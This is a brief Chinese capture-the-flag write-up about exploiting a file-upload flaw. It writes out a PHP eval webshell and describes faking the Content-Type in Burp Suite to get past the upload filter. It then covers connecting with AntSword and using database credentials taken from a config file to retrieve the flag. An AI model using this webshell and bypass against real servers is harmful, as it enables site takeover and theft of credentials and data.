打开之后很明显是个文件上传漏洞
当然也有可能是我层次太低看不出来还有哈别的可能
f12后也证明了这一点
虽然好像和这个include没有什么关系
尝试传一句话木马
之前做过一个带过滤的一句话木马,那个题忘记了,就想着继续按照上次的传,之后发现好像不太行,就换回了最简单的一句话木马
<?php eval($_POST['a']); ?>
上传后提示不支持此类文件格式,之后开始用bp抓包改类型
把里面的Type改为:image/jpeg
上传就成功了
或者先把一句话格式改为jpg,抓包时再改回php也可以
用蚁剑连接
一定要记得连接传文件后的页面!!!
比如我传的文件叫file,那么连接的地址就是url/upload/file
连接成功之后就可以里面的内容了,发现并没有flag,但是在config里面发现了数据库的账号密码,之后用蚁剑连接数据库
用蚁剑连接数据库
对着url右键点数据操作
之后在左上方点击添加,把数据库账号密码输进去连接,之后记得执行一下查询语句,就得到flag了